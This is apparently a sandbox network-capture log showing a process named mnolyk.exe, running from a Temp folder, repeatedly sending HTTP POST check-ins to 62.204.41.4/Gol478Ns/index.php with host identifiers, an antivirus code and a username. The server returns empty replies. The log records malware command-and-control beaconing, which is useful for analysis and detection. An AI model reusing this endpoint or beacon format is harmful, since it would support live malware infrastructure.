Feb 7, 2023 19:57:54.464876890 CET	383	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:54.529468060 CET	384	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
173	192.168.2.5	49882	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:54.716706038 CET	384	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:54.780380011 CET	385	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
174	192.168.2.5	49883	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:54.965081930 CET	385	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:55.032660961 CET	386	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
175	192.168.2.5	49884	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:55.199528933 CET	386	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:55.266089916 CET	387	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
176	192.168.2.5	49885	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:55.454531908 CET	387	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:55.516375065 CET	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
177	192.168.2.5	49886	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:55.680682898 CET	388	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:55.742757082 CET	389	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
178	192.168.2.5	49887	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:55.996114969 CET	389	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:56.062107086 CET	390	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
179	192.168.2.5	49888	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:56.245209932 CET	390	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:56.309570074 CET	391	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.2.5	49715	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:10.319689035 CET	115	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:10.382231951 CET	117	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
180	192.168.2.5	49889	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:56.483664036 CET	391	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:56.548062086 CET	392	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
181	192.168.2.5	49890	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:56.718242884 CET	392	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:56.782778978 CET	393	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
182	192.168.2.5	49891	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:56.954066992 CET	393	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:57.018559933 CET	394	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
183	192.168.2.5	49892	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:57.200519085 CET	394	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:57.264421940 CET	395	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
184	192.168.2.5	49893	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:57.434156895 CET	395	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:57.498948097 CET	396	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
185	192.168.2.5	49894	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:57.677143097 CET	396	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:57.739999056 CET	397	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
186	192.168.2.5	49895	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:57.922450066 CET	397	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:57.986884117 CET	398	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
187	192.168.2.5	49896	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:58.170170069 CET	398	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:58.235466957 CET	399	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
188	192.168.2.5	49897	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:58.416672945 CET	399	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:58.480139971 CET	400	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
189	192.168.2.5	49898	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:58.651415110 CET	400	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:58.716058969 CET	401	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.2.5	49719	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:10.555435896 CET	147	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:10.620309114 CET	147	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
190	192.168.2.5	49899	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:58.885147095 CET	401	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:58.948884010 CET	402	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
191	192.168.2.5	49900	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:59.126281977 CET	402	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:59.192604065 CET	403	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
